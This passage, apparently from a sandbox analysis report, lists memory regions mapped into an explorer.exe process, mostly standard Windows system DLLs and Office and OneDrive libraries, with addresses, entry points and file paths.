monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000076e0000" filename = "" Region: id = 10296 start_va = 0x78d0000 end_va = 0x794ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000078d0000" filename = "" Region: id = 10297 start_va = 0x8f10000 end_va = 0x930ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f10000" filename = "" Region: id = 10298 start_va = 0x73ed0000 end_va = 0x73ed5fff monitored = 0 entry_point = 0x73ed1010 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 10299 start_va = 0x74a90000 end_va = 0x74b72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 10300 start_va = 0x77410000 end_va = 0x77509fff monitored = 0 entry_point = 0x7742a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10301 start_va = 0x77510000 end_va = 0x7762efff monitored = 0 entry_point = 0x77525340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10302 start_va = 0x77630000 end_va = 0x777d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10303 start_va = 0x77800000 end_va = 0x77806fff monitored = 0 entry_point = 0x7780106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 10304 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10305 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10306 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10307 start_va = 0xff320000 end_va = 0xff5dffff monitored = 0 entry_point = 0xff34b790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 10308 start_va = 0x7fef2670000 end_va = 0x7fef26c3fff monitored = 0 entry_point = 0x7fef267104c region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 10309 start_va = 0x7fef26d0000 end_va = 0x7fef3286fff monitored = 0 entry_point = 0x7fef26d1bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 10310 start_va = 0x7fef3290000 end_va = 0x7fef3344fff monitored = 0 entry_point = 0x7fef32b1cd0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 10311 start_va = 0x7fef3350000 end_va = 0x7fef3394fff monitored = 0 entry_point = 0x7fef3354190 region_type = mapped_file name = "qagent.dll" filename = "\\Windows\\System32\\QAGENT.DLL" (normalized: "c:\\windows\\system32\\qagent.dll") Region: id = 10312 start_va = 0x7fef33a0000 end_va = 0x7fef33fdfff monitored = 0 entry_point = 0x7fef33da7fc region_type = mapped_file name = "wwanapi.dll" filename = "\\Windows\\System32\\WWanAPI.dll" (normalized: "c:\\windows\\system32\\wwanapi.dll") Region: id = 10313 start_va = 0x7fef3400000 end_va = 0x7fef341ffff monitored = 0 entry_point = 0x7fef3401010 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 10314 start_va = 0x7fef34a0000 end_va = 0x7fef3565fff monitored = 0 entry_point = 0x7fef34af220 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 10315 start_va = 0x7fef3880000 end_va = 0x7fef388bfff monitored = 0 entry_point = 0x7fef388602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 10316 start_va = 0x7fef4300000 end_va = 0x7fef4330fff monitored = 0 entry_point = 0x7fef4301b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 10317 start_va = 0x7fef4340000 end_va = 0x7fef4394fff monitored = 0 entry_point = 0x7fef43426e4 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 10318 start_va = 0x7fef43a0000 end_va = 0x7fef441efff monitored = 0 entry_point = 0x7fef43a1070 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 10319 start_va = 0x7fef4420000 end_va = 0x7fef464afff monitored = 0 entry_point = 0x7fef4421f00 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 10320 start_va = 0x7fef46c0000 end_va = 0x7fef4717fff monitored = 0 entry_point = 0x7fef46c30f0 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 10321 start_va = 0x7fef5c90000 end_va = 0x7fef5d03fff monitored = 0 entry_point = 0x7fef5c966f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 10322 start_va = 0x7fef5e00000 end_va = 0x7fef5e9cfff monitored = 0 entry_point = 0x7fef5e8d52c region_type = mapped_file name = "fxsapi.dll" filename = "\\Windows\\System32\\FXSAPI.dll" (normalized: "c:\\windows\\system32\\fxsapi.dll") Region: id = 10323 start_va = 0x7fef5ea0000 end_va = 0x7fef5f76fff monitored = 0 entry_point = 0x7fef5ea1254 region_type = mapped_file name = "fxsst.dll" filename = "\\Windows\\System32\\FXSST.dll" (normalized: "c:\\windows\\system32\\fxsst.dll") Region: id = 10324 start_va = 0x7fef7130000 end_va = 0x7fef71f1fff monitored = 0 entry_point = 0x7fef71504b4 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 10325 start_va = 0x7fef7200000 end_va = 0x7fef723efff monitored = 0 entry_point = 0x7fef72012c0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 10326 start_va = 0x7fef7390000 end_va = 0x7fef73aefff monitored = 0 entry_point = 0x7fef7393580 region_type = mapped_file name = "qutil.dll" filename = "\\Windows\\System32\\QUTIL.DLL" (normalized: "c:\\windows\\system32\\qutil.dll") Region: id = 10327 start_va = 0x7fef73b0000 end_va = 0x7fef756cfff monitored = 0 entry_point = 0x7fef73b1010 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 10328 start_va = 0x7fef76b0000 end_va = 0x7fef776cfff monitored = 0 entry_point = 0x7fef76b1ea4 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 10329 start_va = 0x7fef7770000 end_va = 0x7fef77a8fff monitored = 0 entry_point = 0x7fef7771240 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 10330 start_va = 0x7fef77b0000 end_va = 0x7fef77cffff monitored = 0 entry_point = 0x7fef77b1298 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 10331 start_va = 0x7fef77d0000 end_va = 0x7fef7a5afff monitored = 0 entry_point = 0x7fef77d6f5c region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 10332 start_va = 0x7fef7e60000 end_va = 0x7fef7ed3fff monitored = 0 entry_point = 0x7fef7e954c8 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 10333 start_va = 0x7fef82d0000 end_va = 0x7fef831efff monitored = 0 entry_point = 0x7fef82d2760 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 10334 start_va = 0x7fef8320000 end_va = 0x7fef835afff monitored = 0 entry_point = 0x7fef8347600 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv") Region: id = 10335 start_va = 0x7fef8360000 end_va = 0x7fef839afff monitored = 0 entry_point = 0x7fef83622f0 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 10336 start_va = 0x7fef8410000 end_va = 0x7fef85abfff monitored = 0 entry_point = 0x7fef8411030 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 10337 start_va = 0x7fef85b0000 end_va = 0x7fef85cefff monitored = 0 entry_point = 0x7fef85b57b8 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 10338 start_va = 0x7fef85d0000 end_va = 0x7fef864efff monitored = 0 entry_point = 0x7fef862385c region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 10339 start_va = 0x7fef8650000 end_va = 0x7fef868afff monitored = 0 entry_point = 0x7fef8651070 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 10340 start_va = 0x7fef8690000 end_va = 0x7fef869cfff monitored = 0 entry_point = 0x7fef8697104 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 10341 start_va = 0x7fef86a0000 end_va = 0x7fef86a6fff monitored = 0 entry_point = 0x7fef86a1b24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" (normalized: "c:\\windows\\system32\\wlanutil.dll") Region: id = 10342 start_va = 0x7fef8760000 end_va = 0x7fef87dbfff monitored = 0 entry_point = 0x7fef87611d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 10343 start_va = 0x7fef87e0000 end_va = 0x7fef8a82fff monitored = 0 entry_point = 0x7fef87e3498 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 10344 start_va = 0x7fef8b50000 end_va = 0x7fef8b5bfff monitored = 0 entry_point = 0x7fef8b51380 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 10345 start_va = 0x7fef8b60000 end_va = 0x7fef8b93fff monitored = 0 entry_point = 0x7fef8b61890 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 10346 start_va = 0x7fef8ba0000 end_va = 0x7fef8c8dfff monitored = 0 entry_point = 0x7fef8ba12a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 10347 start_va = 0x7fef8c90000 end_va = 0x7fef8d12fff monitored = 0 entry_point = 0x7fef8cb692c region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl") Region: id = 10348 start_va = 0x7fef8d20000 end_va = 0x7fef8ff1fff monitored = 0 entry_point = 0x7fef8d815f0 region_type = mapped_file name = "themeui.dll" filename = "\\Windows\\System32\\themeui.dll" (normalized: "c:\\windows\\system32\\themeui.dll") Region: id = 10349 start_va = 0x7fef9000000 end_va = 0x7fef9007fff monitored = 0 entry_point = 0x7fef9001030 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 10350 start_va = 0x7fef9010000 end_va = 0x7fef908ffff monitored = 0 entry_point = 0x7fef9014a8c region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 10351 start_va = 0x7fef9090000 end_va = 0x7fef909efff monitored = 0 entry_point = 0x7fef9091040 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 10352 start_va = 0x7fef90a0000 end_va = 0x7fef90abfff monitored = 0 entry_point = 0x7fef90a1070 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 10353 start_va = 0x7fef90b0000 end_va = 0x7fef912dfff monitored = 0 entry_point = 0x7fef90b1304 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 10354 start_va = 0x7fef9130000 end_va = 0x7fef9164fff monitored = 0 entry_point = 0x7fef913c59c region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 10355 start_va = 0x7fef9170000 end_va = 0x7fef99edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 10356 start_va = 0x7fef99f0000 end_va = 0x7fef9ba8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 10357 start_va = 0x7fef9bb0000 end_va = 0x7fef9ec5fff monitored = 0 entry_point = 0x7fef9bb3e98 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 10358 start_va = 0x7fef9ed0000 end_va = 0x7fef9ed2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 10359 start_va = 0x7fef9ee0000 end_va = 0x7fef9ee2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 10360 start_va = 0x7fef9ef0000 end_va = 0x7fef9ef2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 10361 start_va = 0x7fef9f00000 end_va = 0x7fef9f02fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 10362 start_va = 0x7fef9f10000 end_va = 0x7fef9f14fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 10363 start_va = 0x7fef9f20000 end_va = 0x7fef9f24fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 10364 start_va = 0x7fef9f30000 end_va = 0x7fef9f32fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 10365 start_va = 0x7fef9f40000 end_va = 0x7fef9fddfff monitored = 0 entry_point = 0x7fef9f89d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 10366 start_va = 0x7fef9fe0000 end_va = 0x7fef9fe3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 10367 start_va = 0x7fef9ff0000 end_va = 0x7fef9ff3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 10368 start_va = 0x7fefa000000 end_va = 0x7fefa002fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 10369 start_va = 0x7fefa010000 end_va = 0x7fefa013fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 10370 start_va = 0x7fefa020000 end_va = 0x7fefa022fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 10371 start_va = 0x7fefa030000 end_va = 0x7fefa032fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 10372 start_va = 0x7fefa040000 end_va = 0x7fefa042fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 10373 start_va = 0x7fefa050000 end_va = 0x7fefa052fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 10374 start_va = 0x7fefa060000 end_va = 0x7fefa062fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 10375 start_va = 0x7fefa070000 end_va = 0x7fefa072fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 10376 start_va = 0x7fefa080000 end_va = 0x7fefa171fff monitored = 0 entry_point = 0x7fefa089060 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 10377 start_va = 0x7fefa180000 end_va = 0x7fefa183fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 10378 start_va = 0x7fefa190000 end_va = 0x7fefa1a6fff monitored = 0 entry_point = 0x7fefa19c440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 10379 start_va = 0x7fefa1b0000 end_va = 0x7fefa3c3fff monitored = 0 entry_point = 0x7fefa1b1000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 10380 start_va = 0x7fefa3d0000 end_va = 0x7fefa49dfff monitored = 0 entry_point = 0x7fefa3f30fc region_type = mapped_file name = "msvcr110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcr110.dll") Region: id = 10381 start_va = 0x7fefa4a0000 end_va = 0x7fefa546fff monitored = 0 entry_point = 0x7fefa4eb93c region_type = mapped_file name = "msvcp110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcp110.dll") Region: id = 10382 start_va = 0x7fefa550000 end_va = 0x7fefa5a5fff monitored = 0 entry_point = 0x7fefa5586e8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncshell64.dll") Region: id = 10383 start_va = 0x7fefa5b0000 end_va = 0x7fefa606fff monitored = 0 entry_point = 0x7fefa5b1118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 10384 start_va = 0x7fefa610000 end_va = 0x7fefa7d9fff monitored = 0 entry_point = 0x7fefa617a60 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 10385 start_va = 0x7fefadc0000 end_va = 0x7fefadd7fff monitored = 0 entry_point = 0x7fefadc1bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 10386 start_va = 0x7fefade0000 end_va = 0x7fefadf0fff monitored = 0 entry_point = 0x7fefade16ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 10387 start_va = 0x7fefae30000 end_va = 0x7fefaea0fff monitored = 0 entry_point = 0x7fefae6ecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 10388 start_va = 0x7fefaeb0000 end_va = 0x7fefaeb8fff monitored = 0 entry_point = 0x7fefaeb2f98 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll") Region: id = 10389 start_va = 0x7fefb020000 end_va = 0x7fefb02afff monitored = 0 entry_point = 0x7fefb021198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 10390 start_va = 0x7fefb030000 end_va = 0x7fefb056fff monitored = 0 entry_point = 0x7fefb0398bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 10391 start_va = 0x7fefb0b0000 end_va = 0x7fefb116fff monitored = 0 entry_point = 0x7fefb0c6060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 10392 start_va = 0x7fefb120000 end_va = 0x7fefb12afff monitored = 0 entry_point = 0x7fefb124f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 10393 start_va = 0x7fefb150000 end_va = 0x7fefb168fff monitored = 0 entry_point = 0x7fefb1511a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 10394 start_va = 0x7fefb1f0000 end_va = 0x7fefb204fff monitored = 0 entry_point = 0x7fefb1f60d8 region_type = mapped_file name = "nlaapi.dll" 